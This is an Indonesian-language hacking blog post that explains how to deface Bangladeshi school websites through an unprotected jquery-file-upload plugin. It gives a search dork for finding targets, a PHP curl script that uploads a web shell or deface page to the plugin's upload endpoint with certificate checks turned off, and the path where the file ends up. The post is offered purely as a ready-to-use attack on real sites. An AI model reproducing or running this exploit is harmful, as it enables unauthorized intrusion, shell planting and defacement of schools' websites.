• 11 June 2016

    hallo.

    kali ini ane pengen share cara deface school Bangladesh.
    ya kyk bug balitbang lah kalo di indo.

    Bugnya ada di plugin jquery-file-upload.
    yaudah langsung aja.

    dork: Developed by exdmania

    script:

     <?php
    $file = "kkk.htm"; //shell ataupun script deface
    $post = array("files[]" => "@$file",
    );
    $ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
    curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch2, CURLOPT_POST, 1);
    curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
    $data = curl_exec ($ch2);
    echo $data."\n\n\n";
    ?>
    POC:

    hasil:
    /assets/super_admin/vendor/jquery-file-upload/server/php/files/




    0 comments

  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo